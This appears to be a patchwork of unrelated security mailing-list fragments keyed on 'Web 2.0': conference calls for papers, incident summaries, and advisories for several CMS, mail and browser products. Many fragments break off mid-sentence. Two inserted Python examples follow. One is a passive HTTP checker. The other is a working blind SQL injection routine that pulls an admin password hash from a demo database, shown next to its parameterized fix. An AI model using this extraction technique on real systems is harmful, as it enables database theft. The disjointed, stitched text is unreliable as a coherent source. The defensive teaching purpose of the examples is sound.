Web 2.0
> Google (*.google.com apps, webmail, etc.) cookies are an easy and
> transparent way to fly, that work now, all the time, and have clear
> business drivers behind them for auth tracking (and working now, all
> the time).
>
> Many modern web 2.0 products use cookies for auth = tracking, not auth
> = confidentiality.
I never said cookies should go away. I merely want cookies to stop
being used for managing authenticated sessions in most applications.
Some applications may still require that flexibility, however, and for
Watcher is a runtime passive-analysis tool for HTTP-based Web applications.
It complements static code analysis and manual security reviews by providing
painless verification of operational and code-level issues at runtime.
Watcher works seamlessly with today’s complex Web 2.0 applications by
running silently in the background while you drive your browser and interact
with the Web-application.
It is being released for free under an Open Source license, the binaries and
source are available through CodePlex at
http://websecuritytool.codeplex.com/. A screenshot of the reporting screen
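The snippet above describes what a runtime passive-analysis tool does: it inspects the HTTP traffic the browser produces anyway and flags issues without sending any request of its own. The following Python is an added illustration of that approach, not Watcher's code; the four checks (cookie flags, missing charset, version banners, third-party script includes) are representative of the class of passive checks such tools run, and the sample responses are constructed, not real captures.

```python
"""Passive checks over already-captured HTTP responses, in the style of a
runtime passive-analysis tool: nothing is sent to the server, every finding
comes from inspecting traffic the browser produced anyway.
Added example; the check set and sample traffic are assumptions."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class Response:
    url: str
    status: int
    headers: list          # [(name, value), ...]; Set-Cookie may repeat
    body: str = ""

    def header(self, name):
        return [v for n, v in self.headers if n.lower() == name.lower()]


def check_cookies(resp):
    """Cookies should carry Secure on HTTPS and HttpOnly everywhere."""
    findings = []
    on_https = urlparse(resp.url).scheme == "https"
    for raw in resp.header("Set-Cookie"):
        pieces = [p.strip() for p in raw.split(";")]
        name = pieces[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in pieces[1:]}
        if on_https and "secure" not in attrs:
            findings.append(f"cookie '{name}' set over HTTPS without Secure")
        if "httponly" not in attrs:
            findings.append(f"cookie '{name}' without HttpOnly")
    return findings


def check_charset(resp):
    """HTML without an explicit charset invites encoding-based XSS (UTF-7 etc.)."""
    ctype = resp.header("Content-Type")
    if ctype and ctype[0].lower().startswith("text/html") \
            and "charset=" not in ctype[0].lower():
        return ["text/html response without charset in Content-Type"]
    return []


def check_server_banner(resp):
    """Version strings in Server/X-Powered-By help an attacker pick exploits."""
    findings = []
    for h in ("Server", "X-Powered-By"):
        for v in resp.header(h):
            if re.search(r"\d+\.\d+", v):
                findings.append(f"{h} header discloses version: {v}")
    return findings


SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']([^\"']+)[\"']", re.I)


def check_third_party_scripts(resp):
    """Script included from another origin runs with this page's privileges."""
    page_host = urlparse(resp.url).hostname
    findings = []
    for src in SCRIPT_SRC.findall(resp.body):
        host = urlparse(src).hostname
        if host and host != page_host:
            findings.append(f"script loaded from third-party host {host}")
    return findings


CHECKS = [check_cookies, check_charset, check_server_banner, check_third_party_scripts]


def analyze(resp):
    """Run every passive check; returns the list of findings for one response."""
    out = []
    for check in CHECKS:
        out.extend(check(resp))
    return out


# Constructed sample traffic (not real captures).
SAMPLES = [
    Response("https://app.example/login", 200,
             [("Content-Type", "text/html"),
              ("Server", "Apache/2.2.11"),
              ("Set-Cookie", "PHPSESSID=abc123; path=/"),
              ("Set-Cookie", "lang=en; path=/; HttpOnly; Secure")],
             '<html><script src="http://cdn.other.example/lib.js"></script></html>'),
    Response("https://app.example/ok", 200,
             [("Content-Type", "text/html; charset=utf-8"),
              ("Server", "Apache"),
              ("Set-Cookie", "sid=xyz; path=/; Secure; HttpOnly")],
             '<html><script src="/static/app.js"></script></html>'),
]


def report():
    """Map each sampled URL to its findings."""
    return {r.url: analyze(r) for r in SAMPLES}


if __name__ == "__main__":
    for url, findings in report().items():
        print(url)
        for f in findings or ["(no findings)"]:
            print("  -", f)
```

The point of structuring it as a list of independent check functions is that a proxy or browser plugin can feed every captured response through `analyze()` as it arrives; new checks are added without touching the capture path, and none of them ever changes what the browser sent.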
(http://whid.xiom.com/whid-2009-3)
A very good example of why insufficient anti-automation is becoming
a major threat to web applications.
* WHID 2009-4: Twitter Personal Info CSRF (http://whid.xiom.com/whid-2009-4)
If you thought Web 2.0 was dangerous, but didn't know just how (or
what Web 2.0 is...), this incident is your answer.
* WHID 2009-5: School data hacked, grades altered
(http://whid.xiom.com/whid-2009-5)
Every student's dream comes true.
• Linux
Mobile Devices/Embedded systems
• SmartPhones
• PDAs
• Game Consoles
Web 2.0
• Web services
• PHP
• .Net
• Web applications
Networking/Telecommunication
Topics range (but are not limited to):
--- Security in new fields
- Vista / Windows
- Web 2.0
- 3G/4G network
- Mobile Handset (Symbian / IPhone / Android / Windows Mobile )
- Banks & Financial institutes
- Business Information System
- Virtualization
We have published a preliminary schedule which can be found on our web site:
https://deepsec.net/schedule/
The topics include social engineering, security of the GSM air interface,
design of secure protocols, physical security, Web 2.0, exploit/malware
analysis & design, security awareness, abusing device drivers, #twitter
risks, attacks on smart-card secured online banking, security risks and
defence for developers, advanced database exploits, abusing firmware,
security analysis of the TCP & IP protocols, key management, incident
response, e-voting, advanced keyboard sniffing, malware for routers,
https://www.owasp.org/index.php/OWASP_Israel_2007_Conference#Program)
Cross Site Request Forgery - Overview and Solutions
Ofer Shezaf, OWASP IL chapter leader, Breach Security
Defeating Web 2.0 Attacks without Recoding Applications
Amichai Shulman, CTO, Imperva
Harvesting Skype Super-Nodes
Omer Dekel, IDC
SMAU, Italy's largest ICT tradeshow.
The conference will consist of two days of top notch trainings and one
day of bleeding edge talks. Topics of presentations this year include
but are not limited to OSX security, hardware hacking, SAP exploiting,
web 2.0 threats and malware analysis.
Aside from highly technical presentations we are pleased to have a
roundtable and a number of talks focusing on the economic aspect of
cybersecurity, brought to you by well known cybersecurity and cybercrime
experts. To read the full line-up of speakers please see:
Introduction
------------
An AJAX based Blind SQL Injection vulnerability exists in
the Web 2.0 CMS framework Urulu [1]. A remote, anonymous
attacker can retrieve arbitrary data from the SQL database.
In addition, depending on the database setup, an attacker
may upload and execute arbitrary PHP code.
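The advisory above gives the shape of the bug (an AJAX endpoint, a blind injection, arbitrary data retrieval) but none of the mechanics. The Python below is an added example, not Urulu's code: a minimal "does this record exist?" endpoint backed by SQLite that splices its parameter into the query, a boolean-based extraction loop that recovers a password hash from nothing but true/false answers, and the parameterized version against which the same loop recovers nothing. The tables and values are constructed. The "upload and execute PHP" escalation the advisory mentions is a separate step that depends on the database account having file-write privileges (e.g. MySQL's FILE privilege with `SELECT ... INTO OUTFILE`) and is not shown here.

```python
"""Boolean-based blind SQL injection against a tiny AJAX-style 'does this
record exist?' endpoint, and the parameterized version that resists it.
Added example with constructed data; not the CMS's own code."""
import sqlite3


def build_db():
    """In-memory database standing in for the CMS backend (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO articles VALUES (1, 'welcome')")
    conn.execute("CREATE TABLE users (name TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d6')")
    return conn


def exists_vulnerable(conn, article_id):
    """Vulnerable pattern: the request parameter is spliced into SQL.
    The endpoint leaks one bit per request (row found or not), which is
    all a blind attack needs."""
    sql = "SELECT 1 FROM articles WHERE id = " + article_id
    return conn.execute(sql).fetchone() is not None


def exists_fixed(conn, article_id):
    """Hardened: validate the type and bind the value as a parameter."""
    try:
        wanted = int(article_id)
    except ValueError:
        return False
    row = conn.execute("SELECT 1 FROM articles WHERE id = ?", (wanted,)).fetchone()
    return row is not None


def _ask(oracle, condition):
    """One yes/no question: a valid id ANDed with an attacker-chosen predicate."""
    return oracle("1 AND (" + condition + ")")


def _bisect(oracle, expression, lo, hi):
    """Smallest v in [lo, hi] for which 'expression > v' is false, i.e. the
    value of the expression, found with log2(hi - lo) requests."""
    while lo < hi:
        mid = (lo + hi) // 2
        if _ask(oracle, f"{expression} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(oracle, subquery, max_len=64):
    """Recover the string returned by `subquery` using only true/false answers.
    Returns (string, number of requests used)."""
    count = [0]

    def counting(param):
        count[0] += 1
        return oracle(param)

    length = _bisect(counting, f"length(({subquery}))", 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # SQLite: unicode() gives the code point, substr() the character at pos.
        code = _bisect(counting, f"unicode(substr(({subquery}), {pos}, 1))", 0, 127)
        chars.append(chr(code))
    return "".join(chars), count[0]


ADMIN_HASH = "SELECT password_hash FROM users WHERE name = 'admin'"


def demo():
    """Run the extraction against both endpoints and report what leaked."""
    conn = build_db()
    leaked, n_vuln = blind_extract(lambda p: exists_vulnerable(conn, p), ADMIN_HASH)
    from_fixed, _ = blind_extract(lambda p: exists_fixed(conn, p), ADMIN_HASH)
    return {"leaked": leaked, "requests": n_vuln, "from_fixed": from_fixed}


if __name__ == "__main__":
    print(demo())
```

Two things to notice: the attack needs no error message and no visible data, only a consistent difference between "row found" and "row not found"; and an AJAX endpoint is the ideal oracle because the browser-side code already calls it hundreds of times without anyone looking. The fix is not escaping the input but refusing to build SQL from it at all.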
If I understand the process, saving the text at [IV. Proof of concept] (following the "~~~...") to an .XHTML file and launching the file using Firefox, I should lose functionality ("Browser doesn't respond any longer to any user input, all tabs are no longer accessible, your work if any (hail to the web 2.0) might be lost.")
Using FF2.0.0.20, the file does not result in loss of use. All tabs are functional. All JAVA links continue to function. Same result for naming the POC file .HTML, .HTM.
>>> Thierry Zoller <Thierry@Zoller.lu> 05/26/2009 13:13 >>>
For those that failed to reproduce, try naming the POC file with an XHTML
extension.
through iFrame attack
(http://whid.xiom.com/whid/2009/12/embassy-of-india-in-spain-found-serving-remote-malware-through-iframe)
It is interesting to note that everything of interest seems to revolve around
"Web 2.0" sites. On another note, the Heartland incident we queried about
last week seems not to be related to web hacking
(http://whid.xiom.com/whid-Is_the_new_Monster_Hack_a_Web_Hack)
~ Ofer
>
> Topics include (but not limited to):
>
> --- Security in new fields
> - Vista
> - Web 2.0
> - 3G/4G network
> - Mobile Handset
> - Banks & financial institutes
> - GRPS & CDMA
> - Routing device
Track 3: New Technologies & services
------------------------------------
- New generation Internet, Post IP and IPv6
- NGN architectures, protocols and services management and delivery
- Web 2.0 applications and IMS (IP Multimedia Subsystems)
- Next generation systems & Service-oriented techniques
- IPTV and content distribution networks
- User-centric networking and services
- multimedia indexing and retrieval
- Personalized access to media systems
Industrial Networking
Security in Carrier Environments
Secure Coding
If you think your talk could be appropriate for the "Defend Track" feel free to apply for that one. Be aware the audience will be different from the one you have at - say - CCC (and we've very few speaker slots left there, too). Of course you can apply for a sole late-night talk as well. Note that - given the attractiveness of Munich's night life - you might have a very small audience there.
Obviously heavy vendor-pitching will not be welcomed warmly and we reserve the right to ask for modifications of confirmed talks if we have the impression there's too much of that in a talk. If you have to offer another "Web 2.0 cross browser unicode overflow" talk you may submit it. However chances will be bigger if you have some more innovative stuff to talk about...
CFP submissions must include the following information:
Background:
===========
Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.
(Product description from Websense Website)
http://www.ibwas.com
Call for Papers
Introduction
There is a change in the information systems development paradigm. The emergence of Web 2.0 technologies has led to the extensive deployment and use of web-based applications and web services as a way to develop new and flexible information systems. Such systems are easy to develop, deploy and maintain and offer impressive features for users, which explains their current wide use.
As a result of this paradigm shift, the security requirements have also changed. These web-based information systems have different security requirements from traditional systems. Important security issues have been found and privacy concerns have also been raised recently. In addition, the emerging Cloud Computing paradigm promises even greater flexibility; however, the corresponding security and privacy issues still need to be examined. Security should cover not only the surrounding environment but also the application core.
This conference aims to bring together application security experts, researchers, educators and practitioners from the industry, academia and international communities such as OWASP, in order to discuss open problems and new solutions in application security. In the context of this track academic researchers will be able to combine interesting results with the experience of practitioners and software engineers.
Conference Topics
Suggested topics for papers submission include (but are not limited to):
• Games Consoles
• E-Readers
6. Web 2.0
• Web services
• PHP
• .Net/.asp
• Web applications
Introduction
============
"Feature complete yet easy to use, WebMail Server Pro provides feature
rich Web 2.0 web-based access to email, calendars, contacts, files and
shared data from any computer with browser and internet connection,
without the usual configuration hassle. Thanks to advanced technologies
and application-like look and feel, Pro suggests it was born to become the
ultimate replacement of Outlook and similar desktop mail clients."
6th & 7th October 2010
* HITB TRAINING 2 - Advanced Exploit Lab
11th & 12th October 2010
* TECH TRAINING 1 - Web 2.0 Hacking - Advanced Attacks and Defense (Ajax, RIA and SOA)
* TECH TRAINING 2 - Network Endpoint Visibility: Digging Deeper
* TECH TRAINING 3 - SAP Security In-Depth
* TECH TRAINING 4 - Hunting Web Attackers
Date: October 13th - Conf Day 1
In-portal is prone to a remote arbitrary file-upload vulnerability
This issue may allow remote attackers to upload arbitrary files, including malicious scripts, and possibly to execute a script on the affected server.
In-portal Web 2.0 CMS v5.0.3 is affected by this issue. Other or lower versions may be vulnerable as well.
Reports indicate that this issue is being exploited in the wild.
The following exploit code is available:
http://inj3ct0r.com/exploits/11949
600715e0 660f122550450960 movlpd xmm4,qword ptr [MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] ds:0023:60094550=3fe62e42fefa39ef
III. Impact
~~~~~~~~~~~
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any (hail to the web 2.0) might be lost.
IV. Proof of concept (hold your breath)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
* WHID 2009-11: Lil Kim Facebook Hacked
(http://whid.xiom.com/WHID/2009/11/Lil_Kim_Facebook_Hacked):
Together with the Soulja Boy incident last year
(http://whid.xiom.com/WHID/2008/56/Soulja_Boy_Myspace_Hacked) and the
Twitter hack earlier this month (http://whid.xiom.com/whid-2009-2), this shows
the inherent insecurity of Web 2.0 due to mismanagement by the (often
high-profile) users.
* WHID 2009-10: MacRumorsLive feed hack
(http://whid.xiom.com/WHID/2009/10/MacRumorsLive_feed_hacked)
* WHID 2009-8: Wired.com Image Viewer Hacked to Create Phony Steve Jobs
Btw, according to Bugtraq (http://www.securityfocus.com/bid/25849/exploit)
an attacker must convince the victim to subscribe to a malicious RSS feed.
As I've already discussed this in my blog post
(http://aviv.raffon.net/2007/08/16/VistaGadgetsGoneWild.aspx) regarding the
Windows Vista's RSS gadget, this claim is not true. In today's Web2.0 era,
if a remote code execution vulnerability exists in RSS readers, it is very
easy to create an RSS based worm.
--Aviv.